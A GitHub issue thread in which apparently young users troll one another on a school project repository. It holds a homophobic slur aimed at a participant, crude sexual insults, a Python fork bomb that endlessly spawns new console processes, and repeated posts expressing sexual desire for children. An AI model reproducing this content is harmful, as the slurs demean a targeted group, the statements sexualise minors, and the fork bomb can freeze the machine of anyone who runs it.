### ISSUE TITLE
I cant pull request you

### ISSUE THREAD

**Issue by MinkMinkM** [sego-w/pindalaleidmine-lol#1]
You suck!

**Comment by karlmartinlokk** [comment]
skill issue

**Comment by MinkMinkM** [comment]
no you suck

**Comment by karlmartinlokk** [comment]
**MinkMinkM is a faggot**

**Comment by tamkivi** [comment]
Guys. Let's keep it civil. Otherwise I will tell the teacher. You guys will be in big trouble then.

**Comment by karlmartinlokk** [comment]
![image](https://user-images.githubusercontent.com/49794848/233552043-94b23c66-0d0e-45ab-981b-c939297f1ed5.png)

**Comment by MinkMinkM** [comment]
Sega be pulling bitches
**He sucks much dick**

**Comment by tamkivi** [comment]
![image](https://user-images.githubusercontent.com/64610274/233552173-cb4d9ddd-d205-48b2-8ed9-96502c353004.png)

**Comment by MinkMinkM** [comment]
import subprocess, sys
while True:
    subprocess.Popen([sys.executable, sys.argv[0]], creationflags=subprocess.CREATE_NEW_CONSOLE)

**Comment by karlmartinlokk** [comment]
![image](https://user-images.githubusercontent.com/49794848/233552294-0efa1470-bb0f-4d9b-83b3-1b7701484855.png)

**Comment by MinkMinkM** [comment]
- [ ] @ 

> ### **_`#[](url)`_**

**Comment by tamkivi** [comment]
![image](https://user-images.githubusercontent.com/64610274/233553563-35952245-bc2d-4d0b-8d1c-4c347122ce15.png)

**Comment by MinkMinkM** [comment]
### _**I love young and innocent little kids**_

**Comment by MinkMinkM** [comment]
> ### _**I love young and innocent little kids**_

I need them rn

**Comment by karlmartinlokk** [comment]
https://media.tenor.com/s7m_gOihdVsAAAAM/kumalala-light-skin.gif
